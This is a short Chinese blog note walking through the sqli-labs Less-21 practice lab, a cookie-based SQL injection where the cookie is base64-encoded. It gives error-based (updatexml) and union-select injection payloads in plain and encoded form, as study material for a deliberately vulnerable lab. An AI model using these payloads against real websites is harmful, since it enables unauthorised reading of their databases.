报错注入:
cookie里:
1' or updatexml(1, concat( 0x7e,version()) ,0) or '
编码后:
MScgb3IgdXBkYXRleG1sKDEsIGNvbmNhdCggMHg3ZSx2ZXJzaW9uKCkpICwwKSBvciAn
然后看到:
下面是回显注入
Sqli-labs-Less-21(笔记)
使用admin进行登录
1.登录成功之后会显示一系列信息
2. 登录失败会显示失败信息。
登录后发现uname的值不是admin而是看不懂的字符
这是因为将admin进行base64转码 YWRtaW4= 解码之后为admin
和第20关相似,只不过这一次将admin进行base64转码
使用burp抓包
在admin后面加上’并进行编码
发送后报错,显示还需要一个)
显示当前数据库
编码前:’) union select 1,2,database() #
编码后:JykgdW5pb24gc2VsZWN0IDEsMixkYXRhYmFzZSgpICM=
以下步骤与Sqli-labs-Less-20相似
注意:在Sqli-labs-Less-21中是’)并且需要编码
在Sqli-labs-Less-20中是’不需要编码
链接:Sqli-labs-Less-20
————————————————
版权声明:本文为CSDN博主「小鸣同学℡」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/qq_44276741/article/details/107466095